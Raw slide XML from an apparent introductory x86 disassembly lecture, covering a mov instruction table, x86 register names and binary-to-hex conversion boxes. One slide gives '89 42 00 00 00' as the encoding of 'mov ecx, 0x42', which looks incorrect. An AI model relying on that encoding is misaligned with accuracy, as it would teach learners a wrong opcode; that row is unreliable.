                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="ffffff"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Mnemonic</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nSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="ffffff"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Dest.. Operand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nSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="ffffff"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Source operand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370800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>mov</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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>ecx</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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>0x42</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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="428" name="Table 4"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1619640" y="3213000"/>
          <a:ext cx="6095520" cy="741240"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2031840"/>
                <a:gridCol w="2031840"/>
                <a:gridCol w="2031840"/>
              </a:tblGrid>
              <a:tr h="370800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="ffffff"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Instruction</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nSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="ffffff"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Mov ecx</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nSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="ffffff"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>0x42</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370800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Opcodes</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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>89</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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>42 00 00 00</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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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X86 Disassembly</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="430" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="431" name="Google Shape;761;p76" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="693360" y="1845000"/>
            <a:ext cx="7756920" cy="3928680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>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X86 Disassembly</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="433"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Registers</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: a small amount of data storage in CPU</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-151920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="434" name="Table 3"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1547640" y="2277000"/>
          <a:ext cx="6316560" cy="3337200"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1744560"/>
                <a:gridCol w="1523880"/>
                <a:gridCol w="1523880"/>
                <a:gridCol w="1524240"/>
              </a:tblGrid>
              <a:tr h="887760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="ffffff"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>General register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nSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="ffffff"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Segment register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nSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="ffffff"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Status register (flag)</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nSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="ffffff"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Instruction pointer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603720">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>EAX (AX,AH, AL)</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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>CS</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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>EFLAGS</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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>EIP</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603720">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>EBX (BX, BH, BL)</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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>SS</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r h="603720">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>ECX (CX, CH, CL)</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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>DS</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603720">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>EDX (DX, DH, DL)</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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>ES</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r h="347760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>EBP (BP)</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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>FS</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347760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>ESP (SP)</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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>GS</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r h="347760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>ESI (SI)</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347760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>EDI (DI)</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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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TextShape 1"/>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Registers</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4844520" y="3357000"/>
            <a:ext cx="3039480" cy="791640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="395e89"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437" name="TextShape 3"/>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X86 Disassembly</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="438" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1763640" y="1772640"/>
            <a:ext cx="6120360" cy="791640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="395e89"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="439" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1907640" y="1845720"/>
            <a:ext cx="725040" cy="91404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1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>1010</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440" name="CustomShape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2634840" y="1841400"/>
            <a:ext cx="725040" cy="91404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1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>1001</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="441" name="CustomShape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3360240" y="1826640"/>
            <a:ext cx="725040" cy="91404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1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>1101</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="442" name="CustomShape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4103640" y="1846440"/>
            <a:ext cx="725040" cy="91404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1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>1100</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
